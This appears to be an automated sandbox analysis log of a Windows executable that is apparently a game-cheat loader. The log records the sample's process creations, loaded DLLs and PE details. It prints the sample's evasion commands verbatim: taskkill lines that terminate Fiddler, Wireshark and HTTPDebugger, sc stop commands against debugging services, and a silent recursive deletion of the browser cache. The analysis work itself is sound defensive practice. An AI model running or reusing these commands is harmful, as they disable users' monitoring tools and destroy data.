Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2640 -s 992
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: oMBUxRQ4cj.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oMBUxRQ4cj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: oMBUxRQ4cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Loader Valorant ESP\x64\Release\EpicGames.pdb source: oMBUxRQ4cj.exe
Source: oMBUxRQ4cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: oMBUxRQ4cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: oMBUxRQ4cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: oMBUxRQ4cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: oMBUxRQ4cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A08660 GetModuleHandleA,GetProcAddress,strpbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,0_2_00007FF7E5A08660
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeAPI coverage: 4.3 %
Source: Amcache.hve.38.drBinary or memory string: VMware
Source: Amcache.hve.38.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.38.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.38.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.38.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.38.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.38.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.38.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.38.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
